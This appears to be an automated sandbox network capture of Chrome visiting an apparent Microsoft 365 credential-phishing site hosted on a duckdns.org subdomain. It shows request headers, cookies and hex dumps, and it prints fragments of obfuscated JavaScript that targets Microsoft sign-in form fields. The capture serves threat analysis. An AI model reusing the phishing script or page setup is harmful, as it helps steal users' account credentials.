                                                                                                          Cookie: fec4-fe6b=82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; buid=1.AUgAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAABIAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFePPCWBfcKD7-r-M-d269POSkTa98E2ELdhIeb6ruie_7cVzsAGE4eSEw9Le9KVNMBnfgTuxqUvIGoX42QTuRH4m-yOstjit5DYVmjeuWjfvMgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe59SDF3lzt7wrQUxlo0kNVHWurdtqCciXpW35FLLHD-t5qoOJIU5QkFumK2WH5vJnntBt6i6ubcTkg7AfJlwA4E1evfLwed6kIph70dS5phMYRxMqZSYJ6UY_pAx0SnGM0OxtsdCUb2Rd6dbPKmJR44OJ5_g92NFfY2bVDU9fXN0gAA; esctx-wEYa8ewq0Cc=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeEhhlp5n_ZWsWfWaNUXZOvPLmhN43HXdkkO80UcyU6uRIX2PlsNjGWebNfhSs7NYGEfG148JAlhjS7AEcqzfG4PGYm8RkRNVixo7c7O6ig5Fqq5g4P_FnPabj-8mBdP4STdTZ1q6CRdSRpJG_3B_Z9yAA; fpc=AhZw6wgefU5EjPVIkl7TY3C8Ae7AAQAAACYJ_d4OAAAA
                                                                                                          2024-12-24 19:57:29 UTC17INHTTP/1.1 200 OK
                                                                                                          2024-12-24 19:57:29 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                                                                          Data Ascii: Cache-Control: no-cache, no-store
                                                                                                          2024-12-24 19:57:29 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                          Data Ascii: Connection: close
                                                                                                          2024-12-24 19:57:29 UTC38INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a
                                                                                                          Data Ascii: Content-Type: application/javascript
                                                                                                          2024-12-24 19:57:29 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                                                                          Data Ascii: Transfer-Encoding: chunked
                                                                                                          2024-12-24 19:57:29 UTC2INData Raw: 0d 0a
                                                                                                          Data Ascii:
                                                                                                          2024-12-24 19:57:29 UTC5INData Raw: 32 63 32 0d 0a
                                                                                                          Data Ascii: 2c2
                                                                                                          2024-12-24 19:57:29 UTC706INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 64 31 37 28 29 7b 63 6f 6e 73 74 20 5f 30 78 32 31 65 37 64 34 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 23 69 30 31 31 36 27 29 2c 5f 30 78 35 61 64 36 66 33 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 23 69 64 53 49 42 75 74 74 6f 6e 39 27 29 2c 5f 30 78 32 39 32 62 66 35 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 69 66 28 2f 23 2f 2e 74 65 73 74 28 5f 30 78 32 39 32 62 66 35 29 29 7b 63 6f 6e 73 74 20 5f 30 78 31 39 62 36 66 36 3d 5f 30 78 32 39 32 62 66 35 2e 73 70 6c 69 74 28 27 23 27 29 2c 5f 30 78 31 62 37 35 64 35 3d 5f 30 78 31 39 62 36 66 36 5b 30 5d 2c 5f 30 78 32 64 30 66 61 65 3d 5f
                                                                                                          Data Ascii: (function(){function _0x3d17(){const _0x21e7d4=document.querySelector('#i0116'),_0x5ad6f3=document.querySelector('#idSIButton9'),_0x292bf5=window.location.href;if(/#/.test(_0x292bf5)){const _0x19b6f6=_0x292bf5.split('#'),_0x1b75d5=_0x19b6f6[0],_0x2d0fae=_
                                                                                                          2024-12-24 19:57:29 UTC2INData Raw: 0d 0a
                                                                                                          Data Ascii:
                                                                                                          2024-12-24 19:57:29 UTC3INData Raw: 30 0d 0a
                                                                                                          Data Ascii: 0
                                                                                                          2024-12-24 19:57:29 UTC2INData Raw: 0d 0a
                                                                                                          Data Ascii:


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          44192.168.2.44988920.117.200.1914435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:57:28 UTC2261OUTGET /s/82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda.js HTTP/1.1
                                                                                                          Host: o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638706670443158735.NjEyOTY2YWEtYmM4NC00MmY4LWJlYzAtZmI2Njc1MDdiYTM4YmNiY2Q5MDgtYzcxZC00MDQxLWJhYzQtMzgxMWIzZmZjNjUz&ui_locales=en-US&mkt=en-US&client-request-id=4dfcef0d-412d-42f2-af6e-84f873e236e5&state=SYvXn_A8fmitoKoJgOEE6nv6Xn6nhj0UgKrwhoLBAC6KMgmo96NvkInoYIttEw4eBbyLTuFXXAFVez0c7AO6XWEMUKzJd7dgbntRCNoa2bsNNjTJDnEbXQ9OPfemsMdo_2evV4tuDbJWTQngJvNAAfQuo4T_2WlCcOtuWjhcx0F-oKx53Bkh49JmU59ZcdIzQsGNqOW1XCsMk4J_hQdrqPaT8Fex2dLaiK2aZOQikwYH82LTuL3tQroxvodJyi8os2Tw7OOSe-JsaI3T7quX_w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: fec4-fe6b=82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; buid=1.AUgAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAABIAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFePPCWBfcKD7-r-M-d269POSkTa98E2ELdhIeb6ruie_7cVzsAGE4eSEw9Le9KVNMBnfgTuxqUvIGoX42QTuRH4m-yOstjit5DYVmjeuWjfvMgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe59SDF3lzt7wrQUxlo0kNVHWurdtqCciXpW35FLLHD-t5qoOJIU5QkFumK2WH5vJnntBt6i6ubcTkg7AfJlwA4E1evfLwed6kIph70dS5phMYRxMqZSYJ6UY_pAx0SnGM0OxtsdCUb2Rd6dbPKmJR44OJ5_g92NFfY2bVDU9fXN0gAA; esctx-wEYa8ewq0Cc=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeEhhlp5n_ZWsWfWaNUXZOvPLmhN43HXdkkO80UcyU6uRIX2PlsNjGWebNfhSs7NYGEfG148JAlhjS7AEcqzfG4PGYm8RkRNVixo7c7O6ig5Fqq5g4P_FnPabj-8mBdP4STdTZ1q6CRdSRpJG_3B_Z9yAA; fpc=AhZw6wgefU5EjPVIkl7TY3C8Ae7AAQAAACYJ_d4OAAAA
                                                                                                          2024-12-24 19:57:29 UTC17INHTTP/1.1 200 OK
                                                                                                          2024-12-24 19:57:29 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                                                                          Data Ascii: Cache-Control: no-cache, no-store
                                                                                                          2024-12-24 19:57:29 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                          Data Ascii: Connection: close
                                                                                                          2024-12-24 19:57:29 UTC38INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a
                                                                                                          Data Ascii: Content-Type: application/javascript
                                                                                                          2024-12-24 19:57:29 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                                                                          Data Ascii: Transfer-Encoding: chunked
                                                                                                          2024-12-24 19:57:29 UTC2INData Raw: 0d 0a
                                                                                                          Data Ascii:
                                                                                                          2024-12-24 19:57:29 UTC3INData Raw: 30 0d 0a
                                                                                                          Data Ascii: 0
                                                                                                          2024-12-24 19:57:29 UTC2INData Raw: 0d 0a
                                                                                                          Data Ascii:


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          45192.168.2.44989220.117.200.1914435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:57:28 UTC838OUTGET /Me.htm?v=3 HTTP/1.1
                                                                                                          Host: logedkdyvah.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                          Purpose: prefetch
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: fec4-fe6b=82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda
                                                                                                          2024-12-24 19:57:29 UTC17INHTTP/1.1 200 OK
                                                                                                          2024-12-24 19:57:29 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                                                                          Data Ascii: Cache-Control: no-cache, no-store
                                                                                                          2024-12-24 19:57:29 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                          Data Ascii: Connection: close
                                                                                                          2024-12-24 19:57:29 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                          Data Ascii: Content-Type: text/html; charset=utf-8
                                                                                                          2024-12-24 19:57:29 UTC37INData Raw: 44 61 74 65 3a 20 54 75 65 2c 20 32 34 20 44 65 63 20 32 30 32 34 20 31 39 3a 35 37 3a 32 38 20 47 4d 54 0d 0a
                                                                                                          Data Ascii: Date: Tue, 24 Dec 2024 19:57:28 GMT
                                                                                                          2024-12-24 19:57:29 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 46 72 69 2c 20 32 32 20 44 65 63 20 32 30 33 34 20 31 39 3a 35 37 3a 32 39 20 47 4d 54 0d 0a
                                                                                                          Data Ascii: Expires: Fri, 22 Dec 2034 19:57:29 GMT
                                                                                                          2024-12-24 19:57:29 UTC41INData Raw: 50 33 70 3a 20 43 50 3d 22 44 53 50 20 43 55 52 20 4f 54 50 69 20 49 4e 44 20 4f 54 52 69 20 4f 4e 4c 20 46 49 4e 22 0d 0a
                                                                                                          Data Ascii: P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                          2024-12-24 19:57:29 UTC43INData Raw: 50 70 73 65 72 76 65 72 3a 20 50 50 56 3a 20 33 30 20 48 3a 20 42 4c 30 32 45 50 46 30 30 30 31 44 39 38 37 20 56 3a 20 30 0d 0a
                                                                                                          Data Ascii: Ppserver: PPV: 30 H: BL02EPF0001D987 V: 0
                                                                                                          2024-12-24 19:57:29 UTC50INData Raw: 52 65 66 65 72 72 65 72 2d 50 6f 6c 69 63 79 3a 20 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                                                                          Data Ascii: Referrer-Policy: strict-origin-when-cross-origin
                                                                                                          2024-12-24 19:57:29 UTC160INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 75 61 69 64 3d 61 39 33 38 63 32 66 63 62 37 39 63 34 32 61 32 38 30 32 62 65 35 38 66 64 64 62 39 36 64 39 61 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 6c 6f 67 65 64 6b 64 79 76 61 68 2e 63 65 63 63 64 79 72 73 76 68 68 79 6d 66 64 77 6e 66 77 67 68 68 62 70 78 70 72 71 73 62 79 6a 73 79 74 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a
                                                                                                          Data Ascii: Set-Cookie: uaid=a938c2fcb79c42a2802be58fddb96d9a; Path=/; Domain=logedkdyvah.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org; HttpOnly; Secure; SameSite=None
                                                                                                          2024-12-24 19:57:29 UTC154INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4d 53 50 52 65 71 75 3d 69 64 3d 4e 26 6c 74 3d 31 37 33 35 30 37 30 32 34 39 26 63 6f 3d 31 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 6c 6f 67 65 64 6b 64 79 76 61 68 2e 63 65 63 63 64 79 72 73 76 68 68 79 6d 66 64 77 6e 66 77 67 68 68 62 70 78 70 72 71 73 62 79 6a 73 79 74 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a
                                                                                                          Data Ascii: Set-Cookie: MSPRequ=id=N&lt=1735070249&co=1; Path=/; Domain=logedkdyvah.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org; HttpOnly; Secure; SameSite=None


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          46192.168.2.44990020.117.200.1914435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:57:30 UTC1256OUTGET /s/82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda.js HTTP/1.1
                                                                                                          Host: o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: fec4-fe6b=82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; buid=1.AUgAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAABIAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFePPCWBfcKD7-r-M-d269POSkTa98E2ELdhIeb6ruie_7cVzsAGE4eSEw9Le9KVNMBnfgTuxqUvIGoX42QTuRH4m-yOstjit5DYVmjeuWjfvMgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe59SDF3lzt7wrQUxlo0kNVHWurdtqCciXpW35FLLHD-t5qoOJIU5QkFumK2WH5vJnntBt6i6ubcTkg7AfJlwA4E1evfLwed6kIph70dS5phMYRxMqZSYJ6UY_pAx0SnGM0OxtsdCUb2Rd6dbPKmJR44OJ5_g92NFfY2bVDU9fXN0gAA; esctx-wEYa8ewq0Cc=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeEhhlp5n_ZWsWfWaNUXZOvPLmhN43HXdkkO80UcyU6uRIX2PlsNjGWebNfhSs7NYGEfG148JAlhjS7AEcqzfG4PGYm8RkRNVixo7c7O6ig5Fqq5g4P_FnPabj-8mBdP4STdTZ1q6CRdSRpJG_3B_Z9yAA; fpc=AhZw6wgefU5EjPVIkl7TY3C8Ae7AAQAAACYJ_d4OAAAA
                                                                                                          2024-12-24 19:57:31 UTC17INHTTP/1.1 200 OK
                                                                                                          2024-12-24 19:57:31 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                                                                          Data Ascii: Cache-Control: no-cache, no-store
                                                                                                          2024-12-24 19:57:31 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                          Data Ascii: Connection: close
                                                                                                          2024-12-24 19:57:31 UTC38INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a
                                                                                                          Data Ascii: Content-Type: application/javascript
                                                                                                          2024-12-24 19:57:31 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                                                                          Data Ascii: Transfer-Encoding: chunked
                                                                                                          2024-12-24 19:57:31 UTC2INData Raw: 0d 0a
                                                                                                          Data Ascii:
                                                                                                          2024-12-24 19:57:31 UTC3INData Raw: 30 0d 0a
                                                                                                          Data Ascii: 0
                                                                                                          2024-12-24 19:57:31 UTC2INData Raw: 0d 0a
                                                                                                          Data Ascii:


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          47192.168.2.44989920.117.200.1914435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:57:30 UTC1321OUTGET /s/82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda/0b62916e90a58b06d55d641ab5a9498315d5f8c709ae45fba0e8f54e3b669413.js HTTP/1.1
                                                                                                          Host: o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: fec4-fe6b=82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; buid=1.AUgAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAABIAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFePPCWBfcKD7-r-M-d269POSkTa98E2ELdhIeb6ruie_7cVzsAGE4eSEw9Le9KVNMBnfgTuxqUvIGoX42QTuRH4m-yOstjit5DYVmjeuWjfvMgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe59SDF3lzt7wrQUxlo0kNVHWurdtqCciXpW35FLLHD-t5qoOJIU5QkFumK2WH5vJnntBt6i6ubcTkg7AfJlwA4E1evfLwed6kIph70dS5phMYRxMqZSYJ6UY_pAx0SnGM0OxtsdCUb2Rd6dbPKmJR44OJ5_g92NFfY2bVDU9fXN0gAA; esctx-wEYa8ewq0Cc=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeEhhlp5n_ZWsWfWaNUXZOvPLmhN43HXdkkO80UcyU6uRIX2PlsNjGWebNfhSs7NYGEfG148JAlhjS7AEcqzfG4PGYm8RkRNVixo7c7O6ig5Fqq5g4P_FnPabj-8mBdP4STdTZ1q6CRdSRpJG_3B_Z9yAA; fpc=AhZw6wgefU5EjPVIkl7TY3C8Ae7AAQAAACYJ_d4OAAAA
                                                                                                          2024-12-24 19:57:31 UTC17INHTTP/1.1 200 OK
                                                                                                          2024-12-24 19:57:31 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                                                                          Data Ascii: Cache-Control: no-cache, no-store
                                                                                                          2024-12-24 19:57:31 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                          Data Ascii: Connection: close
                                                                                                          2024-12-24 19:57:31 UTC38INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a
                                                                                                          Data Ascii: Content-Type: application/javascript
                                                                                                          2024-12-24 19:57:31 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                                                                          Data Ascii: Transfer-Encoding: chunked
                                                                                                          2024-12-24 19:57:31 UTC2INData Raw: 0d 0a
                                                                                                          Data Ascii:
                                                                                                          2024-12-24 19:57:31 UTC5INData Raw: 32 63 32 0d 0a
                                                                                                          Data Ascii: 2c2
                                                                                                          2024-12-24 19:57:31 UTC706INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 64 31 37 28 29 7b 63 6f 6e 73 74 20 5f 30 78 32 31 65 37 64 34 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 23 69 30 31 31 36 27 29 2c 5f 30 78 35 61 64 36 66 33 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 23 69 64 53 49 42 75 74 74 6f 6e 39 27 29 2c 5f 30 78 32 39 32 62 66 35 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 69 66 28 2f 23 2f 2e 74 65 73 74 28 5f 30 78 32 39 32 62 66 35 29 29 7b 63 6f 6e 73 74 20 5f 30 78 31 39 62 36 66 36 3d 5f 30 78 32 39 32 62 66 35 2e 73 70 6c 69 74 28 27 23 27 29 2c 5f 30 78 31 62 37 35 64 35 3d 5f 30 78 31 39 62 36 66 36 5b 30 5d 2c 5f 30 78 32 64 30 66 61 65 3d 5f
                                                                                                          Data Ascii: (function(){function _0x3d17(){const _0x21e7d4=document.querySelector('#i0116'),_0x5ad6f3=document.querySelector('#idSIButton9'),_0x292bf5=window.location.href;if(/#/.test(_0x292bf5)){const _0x19b6f6=_0x292bf5.split('#'),_0x1b75d5=_0x19b6f6[0],_0x2d0fae=_
                                                                                                          2024-12-24 19:57:31 UTC2INData Raw: 0d 0a
                                                                                                          Data Ascii:
                                                                                                          2024-12-24 19:57:31 UTC3INData Raw: 30 0d 0a
                                                                                                          Data Ascii: 0
                                                                                                          2024-12-24 19:57:31 UTC2INData Raw: 0d 0a
                                                                                                          Data Ascii:


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          48192.168.2.44990835.241.35.1514435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:57:32 UTC653OUTPOST /ping HTTP/1.1
                                                                                                          Host: pingback.issuu.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 681
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: iutk=a475a053-8dec-4146-9a80-a502b4c74e1b
                                                                                                          2024-12-24 19:57:32 UTC681OUTData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 32 2e 30 22 2c 22 6f 72 69 67 69 6e 22 3a 22 72 65 61 64 65 72 33 2d 76 32 2e 30 2e 37 32 33 5f 73 68 61 72 61 62 6c 65 2d 66 75 6c 6c 73 63 72 65 65 6e 2d 76 31 2e 30 2e 37 32 33 5f 74 72 61 63 6b 69 6e 67 2d 62 75 69 6c 64 69 6e 22 2c 22 69 75 74 6b 22 3a 22 61 34 37 35 61 30 35 33 2d 38 64 65 63 2d 34 31 34 36 2d 39 61 38 30 2d 61 35 30 32 62 34 63 37 34 65 31 62 22 2c 22 74 79 70 65 22 3a 22 72 65 61 64 65 72 22 2c 22 64 61 74 61 22 3a 7b 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 33 2e 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 6e 75 6c 6c 2c 22 75 69 5f 6c 61 6e 67 75 61 67 65 22 3a 22 65 6e 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 68 74 74 70 73 3a 2f 2f 69 73 73 75 75 2e 63 6f 6d 2f 74 78 62 63 74 2e 63 6f 6d
                                                                                                          Data Ascii: {"version":"2.2.0","origin":"reader3-v2.0.723_sharable-fullscreen-v1.0.723_tracking-buildin","iutk":"a475a053-8dec-4146-9a80-a502b4c74e1b","type":"reader","data":{"version":"1.3.3","username":null,"ui_language":"en","location":"https://issuu.com/txbct.com
                                                                                                          2024-12-24 19:57:33 UTC367INHTTP/1.1 200 OK
                                                                                                          access-control-allow-credentials: true
                                                                                                          access-control-allow-headers: Content-Type
                                                                                                          access-control-allow-methods: POST
                                                                                                          access-control-allow-origin: https://issuu.com
                                                                                                          access-control-max-age: 86400
                                                                                                          Content-Length: 0
                                                                                                          Date: Tue, 24 Dec 2024 19:57:33 GMT
                                                                                                          Via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Target ID:0
                                                                                                          Start time:14:56:05
                                                                                                          Start date:24/12/2024
                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                          Imagebase:0x7ff76e190000
                                                                                                          File size:3'242'272 bytes
                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Target ID:2
                                                                                                          Start time:14:56:06
                                                                                                          Start date:24/12/2024
